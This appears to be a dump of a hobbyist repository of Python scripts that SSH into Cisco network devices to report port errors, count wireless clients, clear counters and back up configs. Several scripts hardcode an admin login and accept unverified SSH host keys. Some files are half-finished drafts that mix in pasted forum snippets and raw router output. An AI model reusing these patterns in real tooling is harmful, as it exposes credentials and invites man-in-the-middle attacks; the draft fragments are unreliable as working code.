row['Password']\n\n ssh = paramiko.SSHClient()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n ssh.connect(ip_addr, username=username, password=password, look_for_keys=False, allow_agent=False)\n ssh_channel = ssh.invoke_shell()\n ssh_channel.send(\"terminal length 0\" + \"\\n\")\n ssh_channel.send(\"show version | inc System serial|uptime|image|Model number|\\*\" + \"\\n\")\n\n time.sleep(0.6)\n outp = ssh_channel.recv(5000)\n shverstring = outp.decode(\"utf-8\")\n shverlist = shverstring.splitlines()\n if shverlist[0] == '':\n del shverlist[0]\n del shverlist[:2]\n # del shverlist[:3]\n del shverlist[-1]\n uptimelist = shverlist[0].split('is ')\n uptime = uptimelist[1]\n imagelist = shverlist[1].split(':')\n imagetemp = imagelist[1]\n\n if imagetemp.startswith('/'):\n image = imagetemp[1:-1]\n\n else:\n image = imagetemp[:-1]\n\n if shverlist[2].startswith('Model'):\n modellist = shverlist[2].split(': ')\n model = modellist[1]\n serialnumlist = shverlist[3].split(': ')\n serialnum = serialnumlist[1]\n else:\n rtrRegex = re.compile(r'(\\*0\\s+)(CISCO\\d+)(\\s+)(\\w+)(\\s+)')\n mo = rtrRegex.search(shverlist[2])\n model = mo.group(2)\n serialnum = mo.group(4)\n\n ssh_channel.send(\"terminal length 0\" + \"\\n\")\n ssh_channel.send(\"show ip int brief | exc down\" + \"\\n\")\n # ssh_channel.send(\"show ip int brief\" + \"\\n\")\n time.sleep(0.6)\n outp = ssh_channel.recv(5000)\n mystring = 
outp.decode(\"utf-8\")\n ipbrieflist = mystring.splitlines()\n hostnamelist = re.split('[>#]', ipbrieflist[1])\n hostname = hostnamelist[0]\n del ipbrieflist[:3]\n del ipbrieflist[-1]\n\n ipbriefRegex = re.compile(r'(\\S+)(.+)')\n\n ipbriefintlist = []\n for elem in ipbrieflist:\n if elem == '':\n continue\n mo = ipbriefRegex.search(elem)\n virtual_int_types = ('Loop', 'Vlan', 'Tunnel', 'Port-channel')\n if (mo.group(1)).startswith(virtual_int_types):\n continue\n # if (mo.group(1)).startswith('Loop') or (mo.group(1)).startswith('Vlan'):\n # continue\n # if (mo.group(1)).startswith('Tunnel') or (mo.group(1)).startswith('Port-channel'):\n # continue\n ipbriefintlist.append(mo.group(1))\n\n print('\\n')\n print(\"=\" * 54 + \"\\n\" + 14 * \" \" + \"Physical Port Error Report\" + \"\\n\" + \"=\" * 54)\n print(\"Hostname:\\t\" + hostname)\n print(\"IP address:\\t\" + ip_addr)\n print(\"Model:\\t\\t\" + model)\n print(\"Serial:\\t\\t\" + serialnum)\n print(\"Uptime:\\t\\t\" + uptime)\n print(\"Version:\\t\" + image)\n print()\n\n output_lines = []\n for intf in ipbriefintlist:\n print(\"Interface \" + intf)\n ssh_channel.send(\"show int \" + intf + \"\\n\")\n time.sleep(0.6)\n outp = ssh_channel.recv(5000)\n shintstring = outp.decode(\"utf-8\")\n shintlist = shintstring.splitlines()\n\n if shintlist[3].startswith(' Description'):\n del shintlist[3]\n if shintlist[19].startswith(' Received'):\n del shintlist[19]\n del shintlist[:19]\n del shintlist[-1]\n\n def striplist(errlist):\n return [item.strip() for item in errlist]\n\n errdict = {}\n for line in shintlist:\n errors_list = striplist(line.split(\",\"))\n\n errRegex = re.compile(r'(\\d+)(\\s)(\\D+)')\n\n for elem in errors_list:\n mo = errRegex.search(elem)\n errdict[mo.group(3)] = int(mo.group(1))\n\n del errdict['packets output']\n del errdict['bytes']\n if 'multicast' in errdict:\n del errdict['multicast']\n\n if any(errdict.values()):\n output_lines.append(\"Interface \" + intf)\n output_lines.append(errdict)\n\n today = time.strftime(\"%x\")\n timenow = time.strftime(\"%X\")\n filename = (hostname + '_' + '%s' + '_' + '%s') % (today, timenow)\n filename = filename.replace(\"/\", \"-\")\n filename = filename.replace(\":\", \"-\")\n\n outputfile = (\"f:\\\\mark\\\\python\\\\Projects\\\\error_detect\\\\\" + filename)\n str_object = json.dumps(output_lines, indent=4, separators=(',', ': '))\n repr(str_object)\n with open(outputfile, 'w') as f:\n f.write(\"=\" * 54 + \"\\n\" + 14 * \" \" + \"Physical Port Error Report\" + \"\\n\" + \"=\" * 54 + \"\\n\")\n f.write(\"Hostname:\\t\" + hostname + \"\\n\")\n f.write(\"IP address:\\t\" + ip_addr + \"\\n\")\n f.write(\"Model:\\t\\t\" + model + \"\\n\")\n f.write(\"Serial:\\t\\t\" + serialnum + \"\\n\")\n f.write(\"Uptime:\\t\\t\" + uptime + \"\\n\")\n f.write(\"Version:\\t\" + image + \"\\n\")\n f.write(str_object)\n \n\ndef main():\n x = 0\n starttime = time.time()\n while x < 5:\n errordetect()\n x += 1\n if x == 5:\n break\n time.sleep(15.0 - ((time.time() - starttime) % 15.0))\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.4695121943950653, "alphanum_fraction": 0.49390244483947754, "avg_line_length": 28.81818199157715, "blob_id": "1d2eb4d07d61d11d58c08aaf0203d5a27cd87ae0", "content_id": "e586b02d947481b5f45a932e32a4722c6c6905c3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 984, "license_type": "no_license", "max_line_length": 93, "num_lines": 33, "path": "/Clients_per_AP/clients_per_ap_with_list.py", 
"repo_name": "mcs618/NetProjects", "src_encoding": "UTF-8", "text": "import re\nfrom collections import defaultdict\n\nclient_sum = \"d:\\\\python\\\\projects\\\\Clients_per_AP\\\\show_client_summary.txt\"\nper_AP = \"d:\\\\python\\\\projects\\\\Clients_per_AP\\\\Clients_per_AP.txt\"\n\nd = defaultdict(int)\ne = defaultdict(list)\n\nwith open(per_AP, 'w') as pap:\n with open(client_sum, 'r') as cs:\n for line in cs:\n regex = re.compile(r'([0-9a-f]{2}[:-]){5}([0-9a-f]{2})(\\s)(.+?)(\\s)')\n mo = regex.search(line)\n ap_name = mo.group(4)\n\n d[ap_name] += 1\n\n for k, v in d.items():\n e[k].append(v)\n\n total = sum(d.values())\n print(\"The total number of attached clients is: \", total)\n print()\n\n print('{:25}{:5}'.format(' AP', 'Count'))\n print('-' * 30)\n\n for k, v in d.items():\n if v > 30:\n print('{:25}{:5}'.format(k, d[k]), \" <----- Client count greater than 30.\")\n else:\n print('{:25}{:5}'.format(k, d[k]))\n" }, { "alpha_fraction": 0.6372641324996948, "alphanum_fraction": 0.6646226644515991, "avg_line_length": 22.04347801208496, "blob_id": "f7e5302cc156cfadbc939993e1770920c5310f16", "content_id": "24b2cecfe8dc1dd907eac36367b42706871d5798", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2120, "license_type": "no_license", "max_line_length": 112, "num_lines": 92, "path": "/error_detect/error_detect_0.30b.py", "repo_name": "mcs618/NetProjects", "src_encoding": "UTF-8", "text": "# v0.30b\n# port error detector\n# mcs\n# 5/1/2017\n#\n# rows 18 - 27\n\nimport paramiko\nimport time\nimport re\n\nip_addr = '192.168.1.204'\nusername = 'admin'\npassword = 'mcs618'\n\nremote_conn_pre = paramiko.SSHClient()\nremote_conn_pre.set_missing_host_key_policy(paramiko.AutoAddPolicy())\nremote_conn_pre.connect(ip_addr, username=username, password=password, look_for_keys=False, allow_agent=False)\nremote_conn = remote_conn_pre.invoke_shell()\noutp = remote_conn.recv(5000)\nmystring = outp.decode(\"utf-8\")\nprint(\"*********\")\nprint(mystring)\nprint(\"*********\")\nmystring = ''\nprint(\"*********\")\nprint(mystring)\nprint(\"*********\")\nremote_conn.send(\"show ip int brief\" + \"\\n\")\ntime.sleep(1)\noutp = remote_conn.recv(5000)\nmystring = outp.decode(\"utf-8\")\nipbrieflist = mystring.splitlines()\nipbrieflen = int(len(ipbrieflist) - 3)\ndel ipbrieflist[:2]\ndel ipbrieflist[ipbrieflen]\nprint()\n\nipbriefRegex = re.compile(r'(\\S+)(.+)')\n\nipbriefintlist = []\nfor elem in ipbrieflist:\n mo = ipbriefRegex.search(elem)\n if (mo.group(1)).startswith('Loop') or (mo.group(1)).startswith('Vlan'):\n continue\n ipbriefintlist.append(mo.group(1))\n\nprint(\"*********\")\nprint(ipbriefintlist[0])\nprint(ipbriefintlist[1])\nprint(\"*********\")\nprint()\n\nremote_conn.send(\"terminal length 0\" + \"\\n\")\nremote_conn.send(\"show int f0/1\" + \"\\n\")\ntime.sleep(1)\noutp = remote_conn.recv(5000)\nshintstring = outp.decode(\"utf-8\")\nprint(\"#####\")\nprint(shintstring)\nprint(\"#####\")\nshintlist = shintstring.splitlines()\nshintlen = int(len(shintlist) - 3)\ndel shintlist[:2]\ndel shintlist[shintlen]\nprint()\nerrors = shintlist[23]\nprint(errors)\nerrors_list = errors.split(\",\")\nprint(\"shintlist: \" + str(errors_list))\nprint()\n\n\ndef striplist(errlist):\n return [item.strip() for item in errlist]\n\n\nerrors_list = striplist(errors_list)\nprint(\"errors_list: \" + str(errors_list))\n\nerrRegex = re.compile(r'(\\d+)(\\s)(\\D+)')\n\nerrdict = {}\nfor elem in errors_list:\n mo = errRegex.search(elem)\n errdict[mo.group(3)] = 
int(mo.group(1))\n if int(mo.group(1)) > 0:\n print(\"There are errors\")\n else:\n print(\"There are no errors\")\n\nprint(errdict)\n" }, { "alpha_fraction": 0.6323674321174622, "alphanum_fraction": 0.6459688544273376, "avg_line_length": 27.188888549804688, "blob_id": "0aab566deec5be51c0c2381d8b18e1f79b8a2073", "content_id": "aff92c2c43c5ce58c6e46d7d2b9b67641c67a662", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5073, "license_type": "no_license", "max_line_length": 125, "num_lines": 180, "path": "/error_detect/error_detect_0.33.py", "repo_name": "mcs618/NetProjects", "src_encoding": "UTF-8", "text": "# v0.33\n# port error detector\n# mcs\n# 5/8/2017\n\nimport paramiko\nimport time\nimport re\nimport json\n\nip_addr = '192.168.1.206'\nusername = 'admin'\npassword = 'mcs618'\n\nremote_conn_pre = paramiko.SSHClient()\nremote_conn_pre.set_missing_host_key_policy(paramiko.AutoAddPolicy())\nremote_conn_pre.connect(ip_addr, username=username, password=password, look_for_keys=False, allow_agent=False)\nremote_conn = remote_conn_pre.invoke_shell()\nremote_conn.send(\"terminal length 0\" + \"\\n\")\nremote_conn.send(\"show ip int brief\" + \"\\n\")\ntime.sleep(0.6)\noutp = remote_conn.recv(5000)\nmystring = outp.decode(\"utf-8\")\nipbrieflist = mystring.splitlines()\nhostnamelist = ipbrieflist[1].split('>')\nhostname = hostnamelist[0]\ndel ipbrieflist[:4]\ndel ipbrieflist[-1]\n\nipbriefRegex = re.compile(r'(\\S+)(.+)')\n\nipbriefintlist = []\nfor elem in ipbrieflist:\n mo = ipbriefRegex.search(elem)\n if (mo.group(1)).startswith('Loop') or (mo.group(1)).startswith('Vlan'):\n continue\n ipbriefintlist.append(mo.group(1))\n\nprint(hostname)\n\noutput_lines = []\nfor intf in ipbriefintlist:\n remote_conn.send(\"show int \" + intf + \"\\n\")\n time.sleep(0.6)\n outp = remote_conn.recv(5000)\n shintstring = outp.decode(\"utf-8\")\n shintlist = shintstring.splitlines()\n\n if shintlist[3].startswith(' Internet'):\n del shintlist[:19]\n del shintlist[-1]\n elif shintlist[8].startswith(' input flow-control'):\n del shintlist[:19]\n del shintlist[-1]\n else:\n del shintlist[:18]\n del shintlist[-1]\n\n\n def striplist(errlist):\n return [item.strip() for item in errlist]\n\n\n errdict = {}\n for line in shintlist:\n errors_list = striplist(line.split(\",\"))\n\n errRegex = re.compile(r'(\\d+)(\\s)(\\D+)')\n\n for elem in errors_list:\n mo = errRegex.search(elem)\n errdict[mo.group(3)] = int(mo.group(1))\n\n del errdict['packets output']\n del errdict['bytes']\n if 'multicast' in errdict:\n del errdict['multicast']\n\n if any(errdict.values()):\n output_lines.append(\"Interface \" + intf)\n output_lines.append(errdict)\n\n\noutputfile = (\"d:\\\\mark\\\\python\\\\Projects\\\\error_detect\\\\\" + hostname)\nstr_object = json.dumps(output_lines, indent=4, separators=(',', ': '))\nrepr(str_object)\nwith open(outputfile, 'w') as f:\n f.write(str_object)\n\n\n\n\n\n\n# print json.dumps(output_lines, indent=4, separators=(',', ': '))\n\n\n\n\noutputfile = (\"d:\\\\mark\\\\python\\\\Projects\\\\error_detect\\\\\" + hostname)\nwith open(outputfile, 'w') as f:\n j = json.dumps(output_lines, indent=4, separators=(',', ': '))\n print(j, f)\nprint()\n\n\n# outputfile = (\"d:\\\\mark\\\\python\\\\Projects\\\\error_detect\\\\\" + hostname)\n# with open(outputfile, 'w') as f:\n # json.dump(output_lines, f)\n# print()\n\n # json.dump(output_lines, f)\n \n # for k, v in errdict.items():\n # print(k, v)\n \n# I am in the process of writing a program that connects 
to a Cisco switch or\n# router and then examines the output of a 'show int '. I then process\\parse the\n# data to the point where I have a dictionary of twenty-one key\\value pairs.\n# All values are integers.\nfor device in devices:\n s = run_show_interfaces(device)\n d = preprocess_parse(s)\n\n # Check each value. If ALL values are zero, then skip that dictionary. If ANY\n # single value is non-zero (it will be a positive integer if it is not zero),\n # then I want to save to a file the entire dictionary.\n if any(d.values()):\n filename = os.path.join(device, '.txt')\n with open(filename, 'w') as f:\n json.dump(d, f)\n\n# FYI, the any() function has an early-out and will stop looking as soon as \n# it finds a non-zero value. In Python 3, values() returns a view of the data\n# so it doesn't copy all of information. In Python 2, use viewvalues() to \n# achieve the same effect. Taken together, this will give you great preformance.\n\n\nd = {\"name\":\"interpolator\",\n \"children\":[{'name':key,\"size\":value} for key,value in sample.items()]}\nj = json.dumps(d, indent=4)\nf = open('sample.json', 'w')\nprint >> f, j\nf.close()\n\n# It this way, I got a pretty-print json file. \n# The tricks print >> f, j is found from here: http://www.anthonydebarros.com/2012/03/11/generate-json-from-sql-using-python/\n\n\n# As a second example, the script next builds a list of dictionaries, \n# with each row in the database becoming one dictionary and each field \n# in the row a key-value pair:\n\nobjects_list = []\nfor row in rows:\n d = collections.OrderedDict()\n d['id'] = row.ID\n d['FirstName'] = row.FirstName\n d['LastName'] = row.LastName\n d['Street'] = row.Street\n d['City'] = row.City\n d['ST'] = row.ST\n d['Zip'] = row.Zip\n objects_list.append(d)\n \nj = json.dumps(objects_list)\nobjects_file = 'student_objects.js'\nf = open(objects_file,'w')\nprint >> f, j\n\n\n\nif SN == SS:\n output_lines.append(\"\\n\" + \"hostname \" + row['Hostname'] + \"\\n\" * 2)\n outputfile = (\"d:\\\\mark\\\\python\\\\switch_cfg_gen\\\\\" + row['Hostname'])\n\n with open(outputfile, \"w\") as f:\n f.writelines(output_lines)\n\n output_lines = []" }, { "alpha_fraction": 0.6098901033401489, "alphanum_fraction": 0.6335164904594421, "avg_line_length": 28.593496322631836, "blob_id": "2d39714c7539e76f8b97b8272231be19850a5a39", "content_id": "2c35ff9cb8d57e2b365a277601bef57c9548a4e9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3640, "license_type": "no_license", "max_line_length": 112, "num_lines": 123, "path": "/error_detect/error_detect_0.34.py", "repo_name": "mcs618/NetProjects", "src_encoding": "UTF-8", "text": "# v0.34\n# port error detector\n# mcs\n# 5/9/2017\n\nimport paramiko\nimport time\nimport re\nimport json\n\nip_addr = '192.168.1.206'\nusername = 'admin'\npassword = 'mcs618'\n\nremote_conn_pre = paramiko.SSHClient()\nremote_conn_pre.set_missing_host_key_policy(paramiko.AutoAddPolicy())\nremote_conn_pre.connect(ip_addr, username=username, password=password, look_for_keys=False, allow_agent=False)\nremote_conn = remote_conn_pre.invoke_shell()\n\nremote_conn.send(\"terminal length 0\" + \"\\n\")\nremote_conn.send(\"show version | inc System serial|uptime|image|Model number\" + \"\\n\")\n# remote_conn.send(\"show version | inc \\*|uptime|image\" + \"\\n\")\ntime.sleep(0.6)\noutp = remote_conn.recv(5000)\nshverstring = outp.decode(\"utf-8\")\nshverlist = shverstring.splitlines()\ndel shverlist[:3]\ndel shverlist[-1]\nuptimelist = 
shverlist[0].split('is ')\nuptime = uptimelist[1]\nimagelist = shverlist[1].split('/')\nimagetemp = imagelist[1]\nimage = imagetemp[:-1]\nmodellist = shverlist[2].split(': ')\nmodel = modellist[1]\nserialnumlist = shverlist[3].split(': ')\nserialnum = serialnumlist[1]\n\nremote_conn.send(\"terminal length 0\" + \"\\n\")\n# remote_conn.send(\"show ip int brief | exc down\" + \"\\n\")\nremote_conn.send(\"show ip int brief\" + \"\\n\")\ntime.sleep(0.6)\noutp = remote_conn.recv(5000)\nmystring = outp.decode(\"utf-8\")\nipbrieflist = mystring.splitlines()\nhostnamelist = ipbrieflist[1].split('>')\nhostname = hostnamelist[0]\ndel ipbrieflist[:4]\ndel ipbrieflist[-1]\n\nipbriefRegex = re.compile(r'(\\S+)(.+)')\n\nipbriefintlist = []\nfor elem in ipbrieflist:\n mo = ipbriefRegex.search(elem)\n if (mo.group(1)).startswith('Loop') or (mo.group(1)).startswith('Vlan'):\n continue\n ipbriefintlist.append(mo.group(1))\n\nprint('\\n')\nprint(\"=\" * 54 + \"\\n\" + 13 * \" \" + \"Device Port Error Report\" + \"\\n\" + \"=\" * 54)\nprint(\"Hostname:\\t\" + hostname)\nprint(\"IP address:\\t\" + ip_addr)\nprint(\"Model:\\t\\t\" + model)\nprint(\"Serial:\\t\\t\" + serialnum)\nprint(\"Uptime:\\t\\t\" + uptime)\nprint(\"Version:\\t\" + image)\nprint()\n\noutput_lines = []\nfor intf in ipbriefintlist:\n remote_conn.send(\"show int \" + intf + \"\\n\")\n time.sleep(0.6)\n outp = remote_conn.recv(5000)\n shintstring = outp.decode(\"utf-8\")\n shintlist = shintstring.splitlines()\n\n if shintlist[3].startswith(' Internet'):\n del shintlist[:19]\n del shintlist[-1]\n elif shintlist[8].startswith(' input flow-control'):\n del shintlist[:19]\n del shintlist[-1]\n else:\n del shintlist[:18]\n del shintlist[-1]\n\n\n def striplist(errlist):\n return [item.strip() for item in errlist]\n\n\n errdict = {}\n for line in shintlist:\n errors_list = striplist(line.split(\",\"))\n\n errRegex = re.compile(r'(\\d+)(\\s)(\\D+)')\n\n for elem in errors_list:\n mo = errRegex.search(elem)\n errdict[mo.group(3)] = int(mo.group(1))\n\n del errdict['packets output']\n del errdict['bytes']\n if 'multicast' in errdict:\n del errdict['multicast']\n\n if any(errdict.values()):\n output_lines.append(\"Interface \" + intf)\n output_lines.append(errdict)\n\noutputfile = (\"d:\\\\mark\\\\python\\\\Projects\\\\error_detect\\\\\" + hostname)\nstr_object = json.dumps(output_lines, indent=4, separators=(',', ': '))\nrepr(str_object)\nwith open(outputfile, 'w') as f:\n f.write(\"=\" * 54 + \"\\n\" + 13 * \" \" + \"Device Port Error Report\" + \"\\n\" + \"=\" * 54 + \"\\n\")\n f.write(\"Hostname:\\t\" + hostname + \"\\n\")\n f.write(\"IP address:\\t\" + ip_addr + \"\\n\")\n f.write(\"Model:\\t\\t\" + model + \"\\n\")\n f.write(\"Serial:\\t\\t\" + serialnum + \"\\n\")\n f.write(\"Uptime:\\t\\t\" + uptime + \"\\n\")\n f.write(\"Version:\\t\" + image + \"\\n\")\n f.write(str_object)\n" }, { "alpha_fraction": 0.5678571462631226, "alphanum_fraction": 0.5848214030265808, "avg_line_length": 29, "blob_id": "ad374fc6f1a7704074640554640a772670a59330", "content_id": "7b594aa418d869ea6cf8fb049ac24ccdc3ffbd01", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3360, "license_type": "no_license", "max_line_length": 111, "num_lines": 112, "path": "/Clients_per_AP/clients_per_ap_v2_temp.py", "repo_name": "mcs618/NetProjects", "src_encoding": "UTF-8", "text": "# v0.10\n# show client summary processing\n# @author mcs\n# 4/1/2018\n\nimport paramiko\nimport time\nimport re\n# import json\nimport csv\nfrom 
collections import defaultdict\n\n\ndef csv_reader(csvfile):\n \"\"\"Read CSV file, return a list of devices.\"\"\"\n device_list = []\n with open(csvfile, \"r\") as datafile:\n datareader = csv.DictReader(datafile)\n for row in datareader:\n if datareader.line_num == 1:\n continue\n ip_addr = row['IP_address']\n username = row['Username']\n password = row['Password']\n device_dict = {'ip_addr': ip_addr, 'username': username, 'password': password}\n # add device to device_list\n device_list.append(device_dict)\n\n return device_list\n\n\ndef login(ip_addr, username, password):\n \"\"\"Establish SSH connection, return SSH conn object.\"\"\"\n ssh = paramiko.SSHClient()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n ssh.connect(ip_addr, username=username, password=password, look_for_keys=False, allow_agent=False)\n ssh_channel = ssh.invoke_shell()\n ssh_channel.send(\"\\n\")\n ssh_channel.send(username + \"\\n\")\n ssh_channel.send(password + \"\\n\")\n # Need to return both ssh and ssh_channel\n return ssh, ssh_channel\n\n\ndef ap_data(ssh_channel):\n ssh_channel.send(\"\\n\")\n ssh_channel.send(\"config paging disable\" + \"\\n\")\n ssh_channel.send(\"show client summary\" + \"\\n\")\n d = defaultdict(int)\n\n time.sleep(0.9)\n outp = ssh_channel.recv(35000)\n shclisumstring = outp.decode(\"utf-8\")\n shclisumlist = shclisumstring.splitlines()\n # print(\"shclisumlist.splitlines(): {}\".format(shclisumlist))\n del shclisumlist[:22]\n del shclisumlist[-3:]\n for line in shclisumlist:\n regex = re.compile(r'([0-9a-f]{2}[:-]){5}([0-9a-f]{2})(\\s)(.+?)(\\s)')\n mo = regex.search(line)\n ap_name = mo.group(4)\n d[ap_name] += 1\n\n total = sum(d.values())\n print(\"The total number of attached clients is: \", total)\n print()\n\n print('{:25}{:5}'.format(' AP', 'Count'))\n print('-' * 30)\n\n for k, v in d.items():\n if v > 30:\n print('{:25}{:5}'.format(k, d[k]), \" <----- Client count greater than 30.\")\n else:\n print('{:25}{:5}'.format(k, d[k]))\n\n\ndef main():\n # Get all devices from csv_file\n # csvfile = \"f:\\mark\\python\\Projects\\error_detect\\SwitchData.csv\"\n csvfile = \"d:\\python\\projects\\Clients_per_AP\\SwitchData.csv\"\n device_list = csv_reader(csvfile)\n\n # ip_addrs = [item['ip_addr'] for item in device_list]\n # for item in device_list:\n # ip_addrs.append(item['ip_addr'])\n\n # Establish SSH connections\n ssh_conns = []\n ssh_save = []\n for a_device in device_list:\n ssh_pre, ssh_conn = login(**a_device)\n # Save the SSH connection to a list\n ssh_conns.append(ssh_conn)\n # Save the SSH preliminary connection to a separate list just to avoid a problem that otherwise happens\n ssh_save.append(ssh_pre)\n\n x = 0\n starttime = time.time()\n while x < 1:\n i = 0\n for a_connection in ssh_conns:\n ap_data(a_connection)\n i += 1\n x += 1\n if x == 1:\n break\n time.sleep(15.0 - ((time.time() - starttime) % 15.0))\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.5289036631584167, "alphanum_fraction": 0.5554817318916321, "avg_line_length": 29.100000381469727, "blob_id": "ddffce0c5b7aec1f1358a49157fc80379911f69b", "content_id": "f7eef7ff5f67626e39b35c4ee780490a390469d3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1505, "license_type": "no_license", "max_line_length": 108, "num_lines": 50, "path": "/error_detect/clear_counters.py", "repo_name": "mcs618/NetProjects", "src_encoding": "UTF-8", "text": "# v0.1\n# clear counters\n# mcs\n# 5/16/2017\n\nimport paramiko\nimport 
time\nimport csv\n\ncsvfile = \"d:\\\\mark\\\\python\\\\Projects\\\\error_detect\\\\SwitchData.csv\"\n\nwith open(csvfile, \"r\") as datafile:\n datareader = csv.DictReader(datafile)\n for row in datareader:\n if datareader.line_num == 1:\n continue\n ip_addr = row['IP_address']\n username = row['Username']\n password = row['Password']\n\n ssh = paramiko.SSHClient()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n ssh.connect(ip_addr, username=username, password=password, look_for_keys=False, allow_agent=False)\n ssh_channel = ssh.invoke_shell()\n \n ssh_channel.send(\"enable\" + \"\\n\")\n time.sleep(0.5)\n outp = ssh_channel.recv(1000)\n output = outp.decode(\"utf-8\")\n if 'Password:' in output:\n ssh_channel.send(password + \"\\n\")\n time.sleep(0.5)\n outp = ssh_channel.recv(1000)\n output = outp.decode(\"utf-8\")\n print(output)\n \n ssh_channel.send(\"clear counters\" + \"\\n\")\n time.sleep(0.5)\n outp = ssh_channel.recv(1000)\n output = outp.decode(\"utf-8\")\n if 'confirm' in output:\n ssh_channel.send(\"\\n\")\n time.sleep(0.5)\n outp = ssh_channel.recv(1000)\n output = outp.decode(\"utf-8\")\n print(output)\n \n ssh_channel.send(\"exit\" + \"\\n\")\n time.sleep(0.3)\n print(\" Exiting...\")\n" }, { "alpha_fraction": 0.5894988179206848, "alphanum_fraction": 0.6628878116607666, "avg_line_length": 28.66371726989746, "blob_id": "71ed4cd4b0ba3d0530665bc11abe5727cf71119c", "content_id": "a64ba70e4535b629d874aa9f2237e0c00305d203", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3352, "license_type": "no_license", "max_line_length": 112, "num_lines": 113, "path": "/error_detect/error_detect_0.30.py", "repo_name": "mcs618/NetProjects", "src_encoding": "UTF-8", "text": "# v0.30\n# port error detector\n# mcs\n# 5/1/2017\n\nimport paramiko\nimport time\nimport re\n\nip_addr = '192.168.1.204'\nusername = 'admin'\npassword = 'mcs618'\n\nremote_conn_pre = paramiko.SSHClient()\nremote_conn_pre.set_missing_host_key_policy(paramiko.AutoAddPolicy())\nremote_conn_pre.connect(ip_addr, username=username, password=password, look_for_keys=False, allow_agent=False)\nremote_conn = remote_conn_pre.invoke_shell()\noutp = remote_conn.recv(5000)\nmystring = outp.decode(\"utf-8\")\nprint(\"*********\")\nprint(mystring)\nprint(\"*********\")\nremote_conn.send(\"show ip int brief\" + \"\\n\")\ntime.sleep(1)\noutp = remote_conn.recv(5000)\nmystring = outp.decode(\"utf-8\")\nprint()\nprint(\"*********\")\nprint(mystring)\nprint(\"*********\")\nprint()\nremote_conn.send(\"terminal length 0\" + \"\\n\")\nremote_conn.send(\"show int f0/1\" + \"\\n\")\ntime.sleep(1)\noutp = remote_conn.recv(5000)\nmystring = outp.decode(\"utf-8\")\nprint(mystring)\nmylist = mystring.splitlines()\nprint()\nerrors = mylist[21]\nprint(errors)\nerrors_list = errors.split(\",\")\nprint(\"errors_list: \" + str(errors_list))\nprint()\n\n\ndef striplist(errlist):\n return [item.strip() for item in errlist]\n\nerrors_list = striplist(errors_list)\nprint(\"errors_list: \" + str(errors_list))\n\nerrRegex = re.compile(r'(\\d+)(\\s)(\\D+)')\n\nerrdict = {}\nfor elem in errors_list:\n mo = errRegex.search(elem)\n errdict[mo.group(3)] = int(mo.group(1))\n if int(mo.group(1)) > 0:\n print(\"There are errors\")\n else:\n print(\"There are no errors\")\n\nprint(errdict)\n\n\n# for elem in range(2, mylist_len - 1):\n # print(mylist[elem])\n\n# for elem in mylist:\n # if elem[0] or elem[1]:\n # continue\n # print(elem)\n\n# 20 - 27\n\nrtr-1841>\nshow ip int brief\nInterface 
IP-Address OK? Method Status Protocol\nFastEthernet0/0 unassigned YES NVRAM administratively down down \nFastEthernet0/1 192.168.1.204 YES NVRAM up up \nLoopback0 172.17.0.1 YES NVRAM up up \nrtr-1841>\nterminal length 0\nrtr-1841>show int f0/1\nFastEthernet0/1 is up, line protocol is up \n Hardware is Gt96k FE, address is 0021.5500.4fa1 (bia 0021.5500.4fa1)\n Internet address is 192.168.1.204/24\n MTU 1500 bytes, BW 100000 Kbit/sec, DLY 100 usec, \n reliability 255/255, txload 1/255, rxload 1/255\n Encapsulation ARPA, loopback not set\n Keepalive set (10 sec)\n Full-duplex, 100Mb/s, 100BaseTX/FX\n ARP type: ARPA, ARP Timeout 04:00:00\n Last input 00:00:00, output 00:00:00, output hang never\n Last clearing of \"show interface\" counters never\n Input queue: 0/75/0/0 (size/max/drops/flushes); Total output drops: 0\n Queueing strategy: fifo\n Output queue: 0/40 (size/max)\n 5 minute input rate 1000 bits/sec, 1 packets/sec\n 5 minute output rate 1000 bits/sec, 1 packets/sec\n 2828 packets input, 267428 bytes\n Received 915 broadcasts (0 IP multicasts)\n 0 runts, 0 giants, 0 throttles\n 0 input errors, 0 CRC, 0 frame, 0 overrun, 0 ignored\n 0 watchdog\n 0 input packets with dribble condition detected\n 3740 packets output, 453148 bytes, 0 underruns\n 0 output errors, 0 collisions, 2 interface resets\n 4 unknown protocol drops\n 0 babbles, 0 late collision, 0 deferred\n 0 lost carrier, 0 no carrier\n 0 output buffer failures, 0 output buffers swapped out\n" }, { "alpha_fraction": 0.5023022294044495, "alphanum_fraction": 0.5328589081764221, "avg_line_length": 28.862499237060547, "blob_id": "c515de518c4de17cdaacaca01e3878bd1ab2a89b", "content_id": "0b455404fefee59fe84c80bb0389290ec31aa60a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2389, "license_type": "no_license", "max_line_length": 108, "num_lines": 80, "path": "/config_backup/config_backup_0.2.py", "repo_name": "mcs618/NetProjects", "src_encoding": "UTF-8", "text": "# @version 0.2\n# device backup\n# @author mcs\n# 5/19/2017\n\nimport paramiko\nimport csv\nimport time\n\n\ncsvfile = \"d:\\\\mark\\\\python\\\\Projects\\\\error_detect\\\\SwitchData.csv\"\n\nwith open(csvfile, \"r\") as datafile:\n datareader = csv.DictReader(datafile)\n for row in datareader:\n if datareader.line_num == 1:\n continue\n ip_addr = row['IP_address']\n username = row['Username']\n password = row['Password']\n\n ssh = paramiko.SSHClient()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n ssh.connect(ip_addr, username=username, password=password, look_for_keys=False, allow_agent=False)\n ssh_channel = ssh.invoke_shell()\n\n ssh_channel.send(\"enable\" + \"\\n\")\n time.sleep(0.3)\n outp = ssh_channel.recv(1000)\n output = outp.decode(\"utf-8\")\n \n if 'Password:' in output:\n ssh_channel.send(password + \"\\n\")\n time.sleep(0.3)\n outp = 